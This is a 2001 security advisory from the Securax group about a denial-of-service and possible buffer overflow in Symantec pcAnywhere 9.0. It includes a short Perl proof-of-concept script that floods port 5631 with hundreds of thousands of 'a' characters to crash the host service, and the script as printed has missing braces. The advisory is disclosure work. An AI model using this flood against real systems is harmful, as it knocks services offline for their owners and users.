Securax-SA-14                                               Security Advisory
belgian.networking.security                                             Dutch
Topic:          Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced:      2001-02-08
Affects:        Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE

  Note: This  entire  advisory has been based upon trial and error results. We
        can not ensure the information  below is 100% correct being that we do
        not have any source code to audit.  This document is subject to change
        without prior notice.

        If you happen to find more information / problems concerning the below
        problem  or  further varients please contact me on the following email
        [EMAIL PROTECTED], or you can contact [EMAIL PROTECTED]

  I.  Problem Description

  Symantec PcAnywhere is a program that  will allow others (who are authorised
  to have access :)) to use your pc. It's simular to a Windows NT 4.0 terminal

  PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631
  (pcanywheredata, according to nmap) and 65301 (pcanywhere).  And when a user
  sends certain data in a particular way, pcAnywhere will crash.

  When a large amount  (it depends,  sometimes the host will go down with 320k
  characters, sometimes, you will have to send 500k bytes of data) are sent to
  a 'waiting' host on  the pcanywheredata port, "AWHOST32.EXE" will crash, and
  give an error on the screen, and write the "Unexpected program error"  to  a
  logfile. (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161)

  Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.

  Why no exploit, just a lame Denial of Service?

    1.) because I suck in win32 debugging / overflowing (but i'm reading)
        /* so if I can overflow win32 progs, i'll code an exploit */
    2.) as the amount of data is variable, it's hard to overflow..

  The DoS code:



   # Symantec PcAnywhere 9.0 Denial of Service
   # -----------------------------------------
   #          by incubus <[EMAIL PROTECTED]>
   #                       http://www.hexyn.be
   #                    http://www.securax.net
   # All my love to Tessa.
   # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
   #            Zym0tic, segfault, #[EMAIL PROTECTED]
   # Thanks to jurgen swennen, for letting me (ab)use his computer.
   # this is intended as proof of concept, do not abuse!

   use IO::Socket;
   $host = "$ARGV[0]";
   $port = 5631;
   if ($#ARGV<0) {
   print "use it like: $0 <hostname>\n";
   $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
   print "hello\n";
   $buf = "";
   for($counter = 0; $counter < 500000; $counter++) {
           $buf .= "\x61";
   print $socket "$buf\n";


  II. Impact

  If someone exploits this, than Symantec is forced to rename the name of this
  product to PcAnyoneAnywhere or something...

  No, seriously, this could lead to a compromise of a system.

  III. possible workarounds

  This advisory was also  sent to Symantec ([EMAIL PROTECTED]), we'll see what
  they do with it...

  IV credits
  love to Tessa.
  greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,
                     and so many, many  others I forgot...

For more information                                      [EMAIL PROTECTED]
Website                                                http://www.securax.org
Advisories/Text                                   http://www.securax.org/pers

Reply via email to